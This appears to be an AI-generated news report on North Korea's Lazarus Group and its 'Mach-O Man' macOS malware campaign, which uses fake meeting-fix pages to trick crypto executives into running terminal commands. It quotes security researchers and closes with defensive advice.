Headline: North Korea’s Lazarus Group ramps up attacks with “Mach-O Man” macOS malware — CertiK
North Korea’s state-backed hacking collective Lazarus Group has rolled out a new macOS malware campaign dubbed “Mach-O Man,” and security researchers warn it’s turning routine business communications into a fast lane for credential theft and fund extraction.
What’s happening
- CertiK researcher Natalie Newson told CoinDesk that Lazarus — which security firms estimate has stolen about $6.7 billion since 2017 — is actively targeting fintech, crypto companies and high-value executives. In just the past two weeks the group allegedly siphoned more than $500 million in the outbreaks tied to the Drift and KelpDAO incidents.
- Newson said the tempo of attacks is what makes Lazarus especially dangerous: “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-directed financial operation running at a scale and speed typical of institutions.” She urged the crypto industry to treat Lazarus like banks treat nation-state cyber actors — as a constant, well-funded threat.
How Mach-O Man works
- Mach-O Man is a modular macOS malware kit developed by Lazarus’s Chollima division, built with native Mach-O binaries tailored to Apple environments where crypto and fintech teams often operate. CertiK says other cybercriminal groups have already adopted the kit.
- The campaign primarily uses a social-engineering technique researchers call “ClickFix.” Attackers send executives urgent meeting invites via Telegram for Zoom, Microsoft Teams, or Google Meet. The meeting link points to a convincing fake site claiming there’s a connection problem and instructing the victim to paste a single command into their Mac terminal to “fix” it.
- These fake verification pages sometimes impersonate Cloudflare or hijack DeFi project domains; guided keyboard shortcuts make victims run a harmful command themselves. Once executed, attackers gain instant access to corporate systems, cloud SaaS accounts and financial resources. Newson warns that the pages and instructions look legitimate, which often allows the attack to bypass traditional security controls.
- Variants exist, and by the time victims discover a breach the malware may have already erased itself, making attribution and remediation more difficult. “They likely don’t know it yet,” Newson said. “If they do, they probably can’t identify which variant affected them.”
Other voices
- Mauro Eldritch, founder of threat-intelligence firm BCA Ltd., described the delivery vector and how the spoofed meeting flow lures targets into running the command.
- Security researcher Vladimir S. reported on X that Lazarus actors have already used the tactic to hijack DeFi domains and display fake Cloudflare-style prompts instructing administrators to run terminal commands.
Why this matters for crypto
- The attack blends targeted social engineering with macOS-native tooling, letting highly motivated, well-funded operators quickly pivot from initial access to full control over financial resources. For crypto firms — many of which rely on remote collaboration tools, cloud services and command-line workflows — the technique poses an acute operational risk.
Practical takeaways
- Security teams and executives should treat any unsolicited instruction to run terminal commands with extreme skepticism.
- Reinforce training on social-engineering risks, verify meeting invites through secondary channels, and implement strict controls around administrative and cloud credential usage.
- Consider additional endpoint monitoring for macOS environments, and harden processes for domain and DNS changes to prevent hijacks.
Bottom line: Mach-O Man demonstrates how state-directed groups are weaponizing everyday workflows to drain wallets and access corporate infrastructure. CertiK’s warning underscores that Lazarus is not a sporadic nuisance but a sustained, institutional-grade threat the crypto sector must defend against.
Read more AI-generated news on: undefined/news
